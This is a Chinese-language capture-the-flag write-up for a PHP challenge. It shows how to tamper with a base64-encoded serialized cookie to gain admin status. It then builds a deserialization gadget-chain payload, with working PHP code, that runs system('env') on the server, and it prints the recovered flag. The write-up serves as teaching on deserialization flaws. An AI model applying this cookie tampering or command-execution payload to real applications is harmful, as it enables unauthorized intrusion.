打开题目便是空白页面,查看源代码,也是空白的,没有任何内容,进行目录扫描发现
有目录,但是内容都是为0
进行抓包,发现cookie中user的值有点像base64编码
尝试进行解码
解码内容是O:4:"User":1:{s:7:"isAdmin";b:0;},
其中b:0:表示一个布尔类型的值,0代表着false为假,1代表着true
也就是讲User对象的isAdmin属性当前为false,就是表示这个用户不是管理员,那就将0改为1,
和原本的user值换一下发包
就返回反序列化代码
<?php error_reporting(0); include('utils.php'); //包含utils.php文件 class A { //定义一个A类,类中有三个公共属性 public $className; public $funcName; public $args; public function __destruct() { //当对象销毁时触发 $class = new $this->className; //将className进行实例化。让这样就可以将className的值为B,就相当于new B了 $funcName = $this->funcName; //funcName属性的值赋值给funcName,这是方法名 $class->$funcName($this->args); //args属性值是参数 } } class B { public function __call($func, $arg) { //当调用不存在的方法时触发,$func是方法名,$arg是参数 $func($arg[0]); //这就是函数回调(function call)!如果 $func = "system",$arg[0] = "id",那么就会执行 system("id")! } } if(checkUser()) { highlight_file(__FILE__); $payload = strrev(base64_decode($_POST['payload'])); //将post传的参数值进行base64加密然后进行字符串反转 unserialize($payload); //这样我们可以将serialize结果先进行字符串反转,然后进行base64编码 }这题比较简单,就是将className等于B类,这样就相当于实例了B类并赋值给了class,class调用$funcName($this->args)就是调用funcName()方法,这个方法在B类中是不存在的,所以就触发了__call方法,触发__call方法传入的两个变量$func, $arg它们分别是funcName属性的值和args的值,触发了__call方法,就会调动$func($arg[0]);这是函数回调,如果 $func = "system",$arg[0] = "id",那么就会执行 system("id")!
所以payload:
<?php class A { public $className; public $funcName; public $args; public function __destruct() { $class = new $this->className; $funcName = $this->funcName; $class->$funcName($this->args); } } class B { public function __call($func, $arg) { $func($arg[0]); } } $a=new A(); $a->className="B"; $a->funcName="system"; $a->args="env"; echo base64_encode(strrev(serialize($a)));ls和ls /都没有发现flag文件,所以看看env中有没有flag
NSSCTF{417cea44-7104-4dee-8235-af0ee3d15ebb}
本题的知识点
其中b:0:表示一个布尔类型的值,0代表着false为假,1代表着true
$func($arg[0]); :这是函数回调!如果 $func = "system",$arg[0] = "id",那么就会执行 system("id")!
strrev函数是将字符串内容反转,就是将字符串中的字符顺序颠倒过来
)
